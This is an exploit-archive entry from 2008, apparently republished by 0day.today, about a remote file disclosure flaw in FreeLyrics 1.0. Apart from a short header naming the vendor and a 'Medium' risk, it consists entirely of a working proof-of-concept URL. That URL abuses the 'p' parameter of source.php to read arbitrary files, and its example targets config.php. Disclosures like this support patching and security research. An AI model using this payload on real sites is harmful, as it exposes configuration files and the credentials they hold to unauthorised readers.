id: 4506
date: 12/19/2008
title: FreeLyrics 1.0 (source.php p) Remote File Disclosure Vulnerability
author: Piker
cves: 

==================================================================
FreeLyrics 1.0 (source.php p) Remote File Disclosure Vulnerability
==================================================================


###############################################################
#
#
#    FreeLyrics Remote Source Code Disclosure Vulnerability
#
#
#    Affected software: FreeLyrics
#    Vendor: http://lyrics.sourceforge.net/
#    Risk: Medium
#
################################################################

#
#    http://[target]/[path]/source.php?p=[FILE]
#
#   PoC: http://[target]/[path]/source.php?p=config.php
#
#   
################################################################



#  0day.today [2023-03-24]  #